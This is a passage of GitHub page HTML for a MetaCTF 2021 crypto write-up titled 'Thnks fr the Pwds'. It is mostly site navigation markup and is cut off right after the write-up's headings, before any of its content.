0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/palanioffcl/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
Permalink
<div class="d-flex flex-items-start flex-shrink-0 pb-3 flex-wrap flex-md-nowrap flex-justify-between flex-md-justify-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md","user_id":null}}" data-hydro-click-hmac="78a21f514f0dc00292f3c3911bcaf686fcedbe672224d9cc8efe4d90302f6199"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>3dfbfc9f6d</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/palanioffcl/CTF-Writeups/refs" cache-key="v0:1639277858.428184" current-committish="M2RmYmZjOWY2ZDUzNmY2ZjQyNzU4ZGE3MTFkMjgwZGZlNjFjZjlkMg==" default-branch="bWFpbg==" name-with-owner="cGFsYW5pb2ZmY2wvQ1RGLVdyaXRldXBz" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span><span><span>CTF-Writeups</span></span></span><span>/</span><span><span>Meta games CTF 2021</span></span><span>/</span><span><span>Crypto</span></span><span>/</span>Thnks fr the Pwds.md </h2> Go to file <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg></summary> <div data-view-component="true"> <span>Go to file</span> <span>T</span> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span> <span>Go to line</span> <span>L</span> </span></button> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="Meta games CTF 2021/Crypto/Thnks fr the Pwds.md" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path
</clipboard-copy> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md" data-view-component="true" class="dropdown-item cursor-pointer"> <span> <span>Copy permalink</span> </span>
</clipboard-copy> </div></details></div>
<div id="spoof-warning" class="mt-0 pb-3" hidden aria-hidden> <div data-view-component="true" class="flash flash-warn mt-0 clearfix"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert float-left mt-1"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg>
<div class="overflow-hidden">This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.</div>
</div></div>
<include-fragment src="/palanioffcl/CTF-Writeups/spoofed_commit_check/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2" data-test-selector="spoofed-commit-check"></include-fragment>
<div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/palanioffcl/CTF-Writeups/contributors/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2"> </div> </div>
<div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1"> </div> <span>Cannot retrieve contributors at this time</span> </div></include-fragment></div>
<readme-toc>
<div data-target="readme-toc.content" class="Box mt-3 position-relative"> <div class="Box-header js-blob-header blob-header js-sticky js-position-sticky top-0 p-2 d-flex flex-shrink-0 flex-md-row flex-items-center" style="position: sticky; z-index: 1;" >
<details data-target="readme-toc.trigger" data-menu-hydro-click="{"event_type":"repository_toc_menu.click","payload":{"target":"trigger","repository_id":426049755,"originating_url":"https://github.com/palanioffcl/CTF-Writeups/blob/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md","user_id":null}}" data-menu-hydro-click-hmac="e80ef0788afc8abc65e3e89c6906725973d4fd5677045c408e14f62a051c1cf8" class="dropdown details-reset details-overlay"> <summary class="btn btn-octicon m-0 mr-2 p-2" aria-haspopup="true" aria-label="Table of Contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-list-unordered"> <path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg> </summary>
<details-menu class="SelectMenu" role="menu"> <div class="SelectMenu-modal rounded-3 mt-1" style="max-height:340px;">
<div class="SelectMenu-list SelectMenu-list--borderless p-2" style="overscroll-behavior: contain;"> MetaCTF 2021 Thnks fr the Pwds (100pts) Description: Procedure: Flag: </div> </div> </details-menu></details>
<div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1">
28 lines (16 sloc) <span></span> 907 Bytes </div>
<div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div class="BtnGroup"> Raw Blame </div>
<div class="d-flex"> <div class="ml-1" > </option></form><form class="BtnGroup-parent js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="20O-rE2JBCCW7rOz6wCbmqPYbYs_2rj0mQd2VAMxprQQ-pt1MLOs0MXNkP-ubSrHSakEhI-5jGLMo5J4DHXgNA" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" data-hotkey="e" data-disable-with="" type="submit" data-view-component="true" class="btn-sm BtnGroup-item btn"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path d="M11.013 1.427a1.75 1.75 0 0 1 2.474 0l1.086 1.086a1.75 1.75 0 0 1 0 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 0 1-.927-.928l.929-3.25c.081-.286.235-.547.445-.758l8.61-8.61Zm.176 4.823L9.75 4.81l-6.286 6.287a.253.253 0 0 0-.064.108l-.558 1.953 1.953-.558a.253.253 0 0 0 .108-.064Zm1.238-3.763a.25.25 0 0 0-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 0 0 0-.354Z"></path></svg></button></form> <details class="details-reset details-overlay select-menu BtnGroup-parent d-inline-block position-relative"> <summary data-disable-invalid="" data-disable-with="" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":false}}" aria-label="Select additional options" data-view-component="true" class="js-blob-dropdown-click select-menu-button btn-sm btn BtnGroup-item float-none px-2"></summary> <div class="SelectMenu right-0"> <div class="SelectMenu-modal width-full"> <div class="SelectMenu-list SelectMenu-list--borderless py-2"> </option></form><form class="SelectMenu-item js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Crypto/Thnks%20fr%20the%20Pwds.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="udP84-yk7UHS_NVICf8sejX_akyEeme6LaD-zbarRQxyatk6kZ5FsYHf9gRMkp0n344DQzQZUyx4BBrhue8DjA" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" type="submit" data-view-component="true" class="btn-invisible btn width-full d-flex flex-justify-between color-fg-muted text-normal p-0"> <div class="mr-5">Edit this file</div> <div class="color-fg-muted">E</div></button></form>
<button aria-label="You must be on a branch to open this file in GitHub Desktop" data-platforms="windows,mac" disabled="disabled" type="submit" data-view-component="true" class="SelectMenu-item no-wrap js-remove-unless-platform btn-invisible btn text-normal"> Open in GitHub Desktop</button> </div> </div> </div> </details></div>
<div > </div>
<button class="btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw" disabled aria-label="You must be signed in to make or propose changes" type="button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg> </button> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="js-blob-dropdown-click btn-octicon p-2" aria-haspopup="true" aria-label="possible actions" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":true}}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> </summary>
View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>MetaCTF 2021</h1><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Thnks fr the Pwds (100pts)</h2><h3 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 